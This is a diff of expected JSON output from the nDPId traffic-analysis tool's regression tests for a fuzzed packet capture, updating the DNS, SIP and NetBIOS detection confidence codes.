-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
-00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470083310,"flow_last_seen":1120470088311,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1120470284935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470284935,"pkt":"ADBUADRWAODtAW69CABFAABEauIAAIARTHPAqAECwKgBAQrRADUAMPnuKv8AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1120470284936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470284936,"pkt":"AODtAW4FADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgB1CtEARyVzAP+AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1120470284937,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470284937,"pkt":"ADBUADRWAODtAW69CABFAAAhauMAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470298331} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284937,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470299325} 
@@ -638,82 +638,82 @@ 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1120470301328,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470301328,"pkt":"ADBUADRWAODtAW69CABFAABIauYAAIB\/TGvAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYnliZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1120470303331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470303331,"pkt":"ADBUADRWAODtAW69CABFBABIaucAAIARTGrAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470303562} 
00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470303331,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAFhOaugAAIARS2XAqAECwKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1120470304312,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABO7ukAAIARS2TAqAECeKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUKqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470305063} 00412{"packet_event_id":1,"packet_event_name":"packet","packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1120470307336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470307336,"pkt":"AFNUADRWAEjtAW69CABFAABIausAAIARTGbAqAECwKgBAQrSADUANCnz\/\/8BAABGAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 